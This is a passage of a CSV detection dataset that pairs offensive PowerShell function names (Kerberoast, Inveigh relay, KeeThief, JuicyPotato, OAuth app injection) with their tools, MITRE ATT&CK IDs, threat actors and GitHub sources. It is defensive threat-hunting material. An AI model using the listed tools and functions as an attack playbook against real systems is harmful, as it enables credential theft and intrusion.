"*Invoke-InjectOAuthApp -AppName *",".{0,1000}Invoke\-InjectOAuthApp\s\-AppName\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49100"
"*Invoke-InjectOAuthApp*",".{0,1000}Invoke\-InjectOAuthApp.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Injects an app registration into the tenant","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49101"
"*Invoke-InstalledProgramsCheck*",".{0,1000}Invoke\-InstalledProgramsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49102"
"*Invoke-InstalledServicesCheck*",".{0,1000}Invoke\-InstalledServicesCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49103"
"*Invoke-InstalledServicesCheck*",".{0,1000}Invoke\-InstalledServicesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49104"
"*Invoke-Interceptor*",".{0,1000}Invoke\-Interceptor.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49105"
"*Invoke-Interceptor.ps1*",".{0,1000}Invoke\-Interceptor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49106"
"*Invoke-InternalMonologue*",".{0,1000}Invoke\-InternalMonologue.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49107"
"*Invoke-Internalmonologue*",".{0,1000}Invoke\-Internalmonologue.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49108"
"*Invoke-Internalmonologue*",".{0,1000}Invoke\-Internalmonologue.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49109"
"*Invoke-InternalMonologue.ps1*",".{0,1000}Invoke\-InternalMonologue\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49110"
"*Invoke-Inveigh*",".{0,1000}Invoke\-Inveigh.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1068","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49111"
"*Invoke-Inveigh*",".{0,1000}Invoke\-Inveigh.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","49112"
"*Invoke-Inveigh*",".{0,1000}Invoke\-Inveigh.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49113"
"*Invoke-Inveigh.ps1*",".{0,1000}Invoke\-Inveigh\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49114"
"*Invoke-InveighRelay*",".{0,1000}Invoke\-InveighRelay.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49115"
"*Invoke-InveighRelay.ps1*",".{0,1000}Invoke\-InveighRelay\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1089","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49116"
"*Invoke-InviteGuest*",".{0,1000}Invoke\-InviteGuest.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Invites a guest user to the tenant","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49117"
"*Invoke-IronCyclone*",".{0,1000}Invoke\-IronCyclone.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","49118"
"*Invoke-IronPython*",".{0,1000}Invoke\-IronPython.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49119"
"*Invoke-IronPython.ps1*",".{0,1000}Invoke\-IronPython\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49120"
"*Invoke-IronPython3*",".{0,1000}Invoke\-IronPython3.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49121"
"*Invoke-IronPython3.ps1*",".{0,1000}Invoke\-IronPython3\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49122"
"*Invoke-JSRatRegsvr*",".{0,1000}Invoke\-JSRatRegsvr.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49123"
"*Invoke-JSRatRegsvr*",".{0,1000}Invoke\-JSRatRegsvr.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49124"
"*Invoke-JSRatRundll*",".{0,1000}Invoke\-JSRatRundll.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49125"
"*Invoke-JSRatRundll*",".{0,1000}Invoke\-JSRatRundll.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49126"
"*Invoke-JuicyPotato*",".{0,1000}Invoke\-JuicyPotato.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49127"
"*Invoke-KeeThief*",".{0,1000}Invoke\-KeeThief.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49128"
"*invoke-kerberoast *",".{0,1000}invoke\-kerberoast\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49129"
"*invokekerberoast*",".{0,1000}invokekerberoast.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","49130"
"*Invoke-Kerberoast*",".{0,1000}Invoke\-Kerberoast.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","1","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","49131"
"*Invoke-Kerberoast*",".{0,1000}Invoke\-Kerberoast.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49132"
"*Invoke-Kerberoast*",".{0,1000}Invoke\-Kerberoast.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - 